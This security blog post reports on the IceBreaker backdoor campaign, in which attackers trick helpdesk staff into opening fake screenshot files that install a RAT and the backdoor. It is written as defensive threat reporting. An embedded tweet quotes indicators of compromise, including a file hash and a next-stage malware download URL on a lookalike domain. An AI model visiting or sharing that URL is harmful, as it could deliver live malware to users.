The method of compromising is based on the fact that tech support workers are tricked into opening malicious screenshots that the attacker sends under the guise of a problem that the user is experiencing. The first attacks were recorded in September 2022 by incident response specialists from Security Joes. They believe that the IceBreaker backdoor is the work of a new advanced attacker using a new and very specific social engineering tactic.

Analyzing the technique in perspective can give a clearer picture of who they are. At any rate, by analyzing data from the September incident, the researchers were able to respond to three other attacks before the hackers could compromise their targets. The only public evidence of the existence of the IceBreaker attacker is an October tweet from MalwareHunterTeam.

"Screenshot-13-28-10-03-2022.jpg.lnk": f97ee203a3dd08ac38d16295dbf9cb0c7476690ba03a05afefed34d7e8cfd44e
Next stage: https://down.xn--screnshot-iib.net/42600
IDN: scrėenshot[.]net
Interesting…
@ShadowChasing1 @h2jazi @StopMalvertisin pic.twitter.com/gS9R8oL1YK

— MalwareHunterTeam (@malwrhunterteam) October 3, 2022

To deliver a backdoor, the attacker contacts the target company’s helpdesk. They mimic a user who is having trouble logging in or registering with an online service. The hackers convince a support person to download an image that describes the problem better than they can explain. Experts say that the image is usually hosted on a fake image hosting service. Such a trick aims at convincing the victim that it was delivered from Dropbox storage.

IceBreaker payload deployment

Links delivered in this way lead to a ZIP archive containing a malicious LNK file. The latter actually downloads the IceBreaker backdoor. Other cases of attacks through tech support involved a Visual Basic script that downloads the Houdini RAT. The latter is in use since at least 2013. Hackers use remote access capabilities of this malware to deploy the final payload – exactly, the IceBreaker. The experts noted that the downloaded malware is a very sophisticated compiled JavaScript file. It can detect running processes, steal passwords, and cookies, and open a reverse tunnel through a proxy. It can also receive and run scripts received from the control server.

The malicious LNK is the first-level payload that delivers the IceBreaker malware, and the VBS file is used as a backup in case the helpdesk operator is unable to run the shortcut. The country of origin of the new actor has not yet been identified, however, researchers say that the dialogues they studied between the attacker and support staff show that the actor is not a native speaker of English. They deliberately request to translate the conversation into Spanish. They have also been observed to speak other languages as well. Representatives of the gaming industry, and not only, should stay on alarm, as hackers use a very effective attack vector and a new arsenal of malware.

What’s next?

Malware delivery ways evolve constantly to correspond with surrounding things. Recent changes in Microsoft policy regarding executing macros in the files from the Internet rendered this method of malware delivery almost useless. Moreover, after almost 4 years of total domination of email spam as a delivery method companies began implementing proactive ways of countering this threat. For that reason seeking new ways of spreading was pretty much an obvious step.

Tactic that involves sending a message with a malicious attachment to tech support was anticipated. Moreover, any media content attracts support managers in their drab and dreary workflow. Fortunately, this new way of malware spreading is not that widespread now, and hackers seemingly found a way to circumvent the restrictions from Microsoft. Nonetheless, ignoring that messages to the support may also carry dangers other than bullying or criticism is reckless.

The post IceBreaker Backdoor Emerged, Exploiting New Phishing Way appeared first on Gridinsoft Blog.